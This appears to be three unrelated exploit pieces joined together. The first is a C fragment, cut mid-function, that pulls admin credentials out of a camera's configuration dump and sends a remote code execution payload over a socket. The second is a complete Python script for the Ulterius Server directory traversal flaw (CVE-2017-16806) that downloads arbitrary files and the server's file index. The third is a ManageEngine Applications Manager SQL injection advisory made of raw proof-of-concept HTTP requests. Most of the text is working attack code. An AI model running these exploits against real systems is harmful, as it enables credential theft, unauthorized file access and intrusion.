Useful reference in the binary data
in order to to find the positions of
credentials
...
...
0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
...
NOTE: reference can be too:
000????: 0006 0606 0606 0100 000a .... .... ....
Other method: parse everything, find the "admin" string and extract the associated password
by adding 31bytes after the address of 'a'[dmin].
Works if the login is admin (seems to be this by default, but can be changed by the user)
*/
if (get_config)
{
for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
printf("%c", tmp[j]);
exit (0);
}
for (unsigned int j = 50; j < 10 * 1024; j++)
{
if (tmp[j - 4] == 0x0a &&
tmp[j - 3] == 0x0a &&
tmp[j - 2] == 0x0a &&
tmp[j - 1] == 0x0a &&
tmp[j] == 0x01)
{
if (j + 170 < 10 * 1024)
{
strcat(out, &tmp[j + 138]);
strcat(out + 32 * sizeof(char), &tmp[j + 170]);
free(tmp);
return (out);
}
}
}
free(tmp);
return (NULL);
}
int rce(char *argv,
char *id,
char attack[],
char desc[])
{
int sock;
struct sockaddr_in serv_addr;
char *payload;
if (!(payload = calloc(512, sizeof(char))))
return (1);
sock = 0;
printf("[+] %s payload ... ", desc);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (1);
}
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (1);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("rce: connect failed\n");
return (1);
}
sprintf(payload, attack, id, id + 32);
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("rce: send failed\n");
return (1);
}
return (0);
}
# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access
# Date: 11/13/2017
# Exploit Author: Rick Osgood
# Vendor Homepage: https://ulterius.io/
# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d
# Version: < 1.9.5.0
# Tested on: Windows Server 2012 R2
# CVE : CVE-2017-16806
#
# You can download almost any file that resides on the same drive letter as Ulterius server.
# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini
#
# Unfortunately, you need to know the path to the file you want to download.
# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:
# http://ulteriusURL:2206/.../fileIndex.db
#
# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to
# make it human readable. Then you can use the same script to download any juicy files you find.
#
# Ulterius writes the following to the fileIndex.db file:
# First four bytes are a timestamp so we can ignore this
# The next four items repeat until the end of the file:
# filename.length (4 bytes?)
# filename
# directory.length (4 bytes?)
# directory
import requests
import sys
import argparse
import zlib
import struct
# This function grabs the filename or file path from the fileIndex
def processChunk(i, data):
length = struct.unpack('B', data[i])[0]
length += struct.unpack('B', data[i+1])[0]
length += struct.unpack('B', data[i+2])[0]
length += struct.unpack('B', data[i+3])[0]
i += 4
filename = data[i:i+length]
i += length
return i, filename
# Main function
def main():
# Parse arguments
parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')
parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')
parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')
parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')
args = parser.parse_args()
# We are going to retrieve a specified file
if args.retrieve:
fileName = str(args.retrieve[0])
# This works for the default Ulterius install directory.
baseDir = "/.../.../.../.../.../.../.../.../.../"
# Remove slashes from output file name
outFile = fileName.replace('\\','_')
# Remove drive letter and change slashes
if ":\\" in fileName[:3]:
fileName = fileName[3:]
# Replace slashes
fileName = fileName.replace('\\','/') # Replace slashes
# Build URL
url = str(args.url[0]) + baseDir + fileName
print "Retrieving " + url
# Download file
r = requests.get(url=url, stream=True) # Retrieve file
# Write file
f = open(outFile, 'w')
f.write(r.content)
# We are going to download the fileIndex.db file
if args.index:
# Setup the URL
url = args.url[0] + "/.../fileIndex.db"
print "Downloading " + url
# Download file
r = requests.get(url=url, stream=True)
# decompress the data
data = zlib.decompress( r.content, -15 )
# Open output file for writing
f = open('fileIndex.db', 'w')
# Strip off header info (not sure what this is)
data = data[8:]
# Process file names and write to output file
i = 0
while i < len(data):
i, filename = processChunk(i, data) # Get file name
i, directory = processChunk(i, data) # Get file path
i += 8 # Skip the FFFFFFFFFFFFFFFF
f.write(directory + '\\' + filename + '\n') # Write to output file
if __name__ == "__main__":
main()
ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities.
Proof of Concept 1 (name= parameter is susceptible):
POST /manageApplications.do?method=insert HTTP/1.1
Host: 192.168.1.190:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Referer: http://192.168.1.190:9090/admin/createapplication.do?method=createapp&grouptype=1
Cookie: testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJESNNXc4I4Ts1omY%2FiCOo47Ch6sZEoC7bRr4SfuGTOVfjv2JZAH6cun8; liveapm-_zldt=cfa03604-1dc4-4155-86f7-803952114141; diagnosticsAlarmTable_sortdir=down; JSESSIONID_APM_9090=A16B99B2C0C09EB6060B4372660CFBC3
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=66ef9ed22c8b3a67da50e905f7735abd&addmonitors=0&name=My+App2&description=Description....This+service+is+critical+to+our+business&grouptype=1&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=
Proof of Concept 2 (crafted viewProps yCanvas field):
POST /GraphicalView.do? HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/GraphicalView.do?&method=createBusinessService
Content-Length: 457
Cookie: JSESSIONID_APM_9090=53E8EBC71177607C3A7FE03EB238887E
Connection: close
&method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"showLabel":true,"showOnlyMGs":false,"showOnlyTopMGs":false,"showOnlyCritical":false,"showOnlyMGStatus":false,"backgroundColorVal":"#FFFFFF","lineColorVal":"#888c8f","textColorVal":"#444444","lineThickness":"2.5","lineTransparency":1,"xCanvas":-23.089912210349002,"yCanvas":0},"coordinates":"{\"totalNumberOfNodes\":0,\"nodeIdList\":[]}"}&haid=10000106&nodeIdVsResourceId={"node_1":"10000106"}
Proof of Concept 3:
POST /GraphicalView.do HTTP/1.1
Host: 192.168.1.191:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.191:9090/showapplication.do?haid=10000106&method=showApplication&selectM=flashview&viewid=1
Content-Length: 101
Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability
Connection: close
method=getLatestStatusForJIT&haid=10000106&viewid=1¤time=1509869908111&resourceIDs=(0000106,0)